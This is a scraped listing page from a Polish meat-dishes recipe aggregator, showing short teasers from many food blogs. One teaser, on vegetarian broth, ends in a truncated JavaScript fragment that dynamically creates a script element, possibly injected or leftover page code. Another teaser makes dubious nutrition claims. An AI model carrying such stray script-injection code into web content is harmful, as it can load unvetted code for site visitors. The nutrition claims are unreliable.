dania mięsne - 13801 przepisów (strona:739/921)

kapsalon domowy 133

 Holenderski fast food składający się z frytek, gyrosa, sera i  warzyw.  Składniki 700 g ziemniaków,lub gotowych frytek 500 g piersi z kurczaka

w mojej kuchni
Miał być gulasz, a wyszła zapiekanka makaronowa, czyli perypetii obiadowych ciąg dalszy ;) 156

Po poniedziałkowej, prostej zapiekance ziemniaczanej miałam mocne postanowienie przygotować normalny "szanujący" się obiad na następny dzień. Wieczorem wyjęłam mięsko na gulasz by we wtorek  z

Kuchnia po mojemu
Pasta e fagioli - makaron z fasolą w pomidorach 201

Warto czasem dać odpocząć organizmowi od wyrobów pochodzenia zwierzęcego. Poniżej przedstawiam wam przepis na pasta e fagioli, czyli makaron z fasolą w wersji wege. Smakuje trochę jak fasolka po bretońsku, trochę jak bolognese. Przepis znalazłam na stronie Fat-free vegan. Zapraszam do gotowania!Składniki na 4-6 porcji:1 szklanka fasoli borlotti albo pinto (lub żurawinowej, ale ja takiej(...)nieaktywne drożdże można kupić w sklepach ze zdrową żywnością. Dodaje potrawom tzw. smaku 'umami' - jeden z pięciu podstawowych smaków odczuwanych przez człowieka. Może być opisany jako "rosołowy" lub "mięsny". Pozostawia długotrwałe wrażenie tłustości na języku.Przepis bierze udział w akcjach

My Culinary Art
Piersi z kurczaka w śmietanie z kaszą jęczmienną mazurską. 161

Witajcie :) zapraszam dzisiaj na pyszny gulasz z piersi z kurczaka w sosie śmietanowym i wyśmienitą kaszą jęczmienną  Młynów Stoisław. Wszystkich zainteresowanych produktami zapraszam na stronę

Sama słodycz i szczypta chili
Fasolka po bretońsku 178

Madzia zaskoczyła mnie po raz kolejny :) Tym razem na obiad będzie jedno z moich ulubionych dań, a mianowicie fasolka po bretońsku. Jak przystało na każdą

Kulinarnyblog.pl - wiesz jak gotować!
Gołąbki z kapusty włoskiej z mięsem i pieczarkami 173

Miałam dzisiaj wielką ochotę na gołąbki. Zrobiłam z kapusty włoskiej , mięsa i pieczarek. Jeżeli nie chcecie z mięsem możecie go pominąć. Będą gołąbki jarskie. Siedziałam jak

O kuchni z uczuciem
Kotlety mielone z jajkiem z sosem grzybowym 219

0,5 kg mięsa mielonego z indyka1 czerstwa kajzerka250 ml mleka2 jajka3 ząbki czosnku2 cebule2-3 łyżki gęstego majonezu1 płaska łyżeczka przyprawy do mięsa mielonego3-4

Świat Domowej Kuchni
Confit z kaczki, czyli kacze uda w conficie 139

miejsce w przypadku Confit d’Oignons , albo jako kandyzowanie w cukrze lub syropie cukrowym, jak w przypadku Fruits Confits . Obecnie pod pojęciem Confit znajdują się wszystkie potrawy (zarówno mięsne, jak z owocami czy warzywami) , które gotowane są do momentu, aż zaczynają być bardzo miękkie, zaczynają się rozpadać, rozpływać się w ustach. Przykładowo Confit de pommes to wolno gotowany deser(...)wpis.   Dzisiejszy przepis na confit z kaczki Dzisiejszy przepis na Confit z kaczki , to moje ulubione popisowe danie, które lubię przygotowywać na rodzinne imprezy (zwiększając odpowiednio ilość kaczych nóg). Głównie ze względu na smak, prostotę i możliwość przygotowania dania z wyprzedzeniem, co w przypadku wszelkim imprez jest bardzo pożądane. Kacze uda dzień przed gotowaniem obtaczane

Moja Delicja
Domowe Hamburgery 232

Hamburger to jedno z najpopularniejszych dań typu fast food będące niemal jego symbolem. Nie ma baru szybkiej obsługi w którego menu nie znaleźlibyśmy tej "potrawy". Mimo ogólnej jego dostępności w budkach i restauracjach fast food ten "domowy hamburger" z pewnością jest najzdrowszą formą w jakiej możemy go zjeść i uważam, że jest zdecydowanie najsmaczniejszy oraz najlepszy. Jeżeli zależy(...)stopni przez ok. 10 minut.Burgery:Cebulę bardzo drobno kroimy (możemy również zetrzeć na tarce), podobnie postępujemy z czosnkiem.Dodajemy pozostałe składniki na hamburgery, wrzucamy po szczypcie przypraw i wyrabiamy masę mięsną do dokładnego połączenia składników. Z masy mięsnej formujemy ok. 8 kul, które następnie spłaszczamy tworząc płaskie "kotlety". Smażymy je na niewielkiej ilości oleju z obu stron na złoty kolor

Słodka Strona
Myślisz tym co zjesz i ważniejsze - jak zjesz... 146

Pulpety mięsne + surówka      Do właściwego odżywiania większość ludzi na świecie nie jest przyzwyczajona i nie przywiązuje uwagi. Świat od tysięcy lat nie wiele się zmienił. W starożytnej Grecji dietę np. wegetariańską stosowały tylko elity intelektualne, a reszta społeczeństwa jadła co chciała i jak chciała. Dziś wiele się nie zmieniło. Ze sklepowych półek znika śmieciowe jedzenie, a fast(...)stwierdzenia udowodnili już Grecy. Eliminowali mięso, ale nie białko, które jest potrzebne do procesów myślowych, tworzenia komórek i połączeń nerwowych, oraz procesów zapamiętywania, czyli układania klastrów białkowych z blokami danych, informacji... Tego wszystkiego co dziś widzieliśmy, słyszeliśmy, czuliśmy oraz pomysłów i wniosków, które co przemyśleliśmy.       Dlaczego Grecy nie jedli mięsa? Już wtedy doszli do jakiś wniosków

Dieta Rozdzielna i Zdrowie
Pieczeń z mięsa mielonego z polędwiczką 417

Pieczeń z mięsa mielonego z polędwiczką Po słodkościach nadszedł czas na wytrawną propozycję. Tym razem polecam Wam przepis na pieczeń z mięsa mielonego, które otacza polędwiczkę

Pełny talerz
Oszukane udka przepiórcze 168

Pomysł na taką przekąskę znalazłam dawno temu, ale zawsze coś stało na przeszkodzie, aby wypróbować te oszukane przepiórcze udka..Wg przepisu znalezionego tutaj , powinno być mięso

Moje domowe kucharzenie
Jak zrobić steki z wołowiny? Pomysł na danie z grilla 104

spożywanie mięsa wołowego ją wywołuje, że konsumpcja wołowiny z dnia na dzień spadła diametralnie. To oczywiście odbiło się na rynku i konsumpcji. Wiele gatunków krów tych typowo mięsnych- jak np. rasa czerwona - kiedyś bardzo popularna, dzisiaj pomału odradzana w Polsce, zostało zlikwidowanych. Wołowina przestała gościć na naszych stołach zajął ją kurczak i wieprzowina. Niestety. Dobrej jakości wołowina to bardzo dobre(...)marmur. Marmurkowa struktura mięsa wołowego czyli przeplatana tkanka mięsna tłuszczem wołowym, to idealny kawałek mięsa na steka. Niestety takie bez problemu znajdziemy za granicami naszego kraju jadąc przez dowolny kraj na zachód Europy, w Polsce musimy się wysilić. Poszukać dobrego sklepu mięsnego, może na ryneczku lokalnym, albo sklepu mięsnego z tradycjami. Jeśli Twoja sztuka mięsa nie będzie odpowiednio "marmurkowa

SMYKWKUCHNI
Rosół wegetariański 159

Żaden wegetariański  rosół  nie może się obyć bez opalonej cebuli, selera, marchewki oraz łodyg natki pietruszki. Sosu sojowego – umożliwi on nadanie potrawie smaku umami, którego nośnikiem są mięsne produktu. Dzięki niemu,  rosół  nabierze specyficznego, głębokiego posmaku. Kropli oleju – pozwoli on na lepsze rozprowadzenie się smaków poszczególnych produktów znajdujących się w garnku. Długiego gotowania pod przykryciem – gotowanie(...)przecedzamy przez sito, na którym zostaną wszystkie warzywa i przyprawy. Dokładnie wyciskamy wszystkie składniki, tak by oddały do garnka swoje soki, w których znajduje się najcenniejszy smak. Tak przyrządzone danie można dodatkowo przyprawić odrobiną soli i pieprzu.  Rosół  serwujemy z makaronem, posiekanymi liśćmi pietruszki i niewielkim kawałkiem marchewki z wywaru. (function(){ a8iw=document.createElement("script");a8iw

Moja smaczna kuchnia
Kotlety mielone w cieście francuskim 138

Cześć Dziś będzie kolejny przepis na mielone. Tym razem w trochę mniej tradycyjnej formie, tzn. pieczone w cieście francuskim. Chociaż fanką ciasta francuskiego nie jestem, ale

blog.moje-pasje.info